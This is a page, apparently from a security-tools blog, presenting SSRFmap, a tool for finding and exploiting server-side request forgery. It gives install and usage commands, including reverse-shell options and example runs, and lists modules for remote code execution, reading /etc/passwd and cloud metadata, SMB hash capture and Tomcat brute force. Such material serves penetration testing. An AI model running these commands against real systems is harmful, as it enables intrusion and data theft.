SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Note : Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Also Read : Pwndb : Search For Leaked Credentials

Guide / RTFM

Basic install from the Github repository.

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [–lhost LHOST] [–lport LPORT] [–level LEVEL]

optional arguments:
-h, –help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
–lhost LHOST LHOST reverse shell
–lport LPORT LPORT reverse shell
–level [LEVEL] Level of test to perform (1-5, default: 1)

The default way to use this script is the following.

Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis –lhost=127.0.0.1 –lport=4242 -l 4242
-l create a listener for reverse shell on the specified port
–lhost and –lport work like in Metasploit, these values are used to create a reverse shell payload
–level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> …

A quick way to test the framework can be done with data/example.py SSRF service.

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules

The following modules are already implemented and can be used with the -m argument.

NameDescription
fastcgiFastCGI RCE
redisRedis RCE
githubGithub Enterprise RCE < 2.8.7
zabbixZabbix RCE
mysqlMySQL Command execution
dockerDocker Infoleaks via API
smtpSMTP send mail
portscanScan ports for the host
networkscanHTTP Ping sweep over the network
readfilesRead files such as /etc/passwd
alibabaRead files from the provider (e.g: meta-data, user-data)
awsRead files from the provider (e.g: meta-data, user-data)
gceRead files from the provider (e.g: meta-data, user-data)
digitaloceanRead files from the provider (e.g: meta-data, user-data)
socksproxySOCKS4 Proxy
smbhashForce an SMB authentication via a UNC Path
tomcatBruteforce attack against Tomcat Manager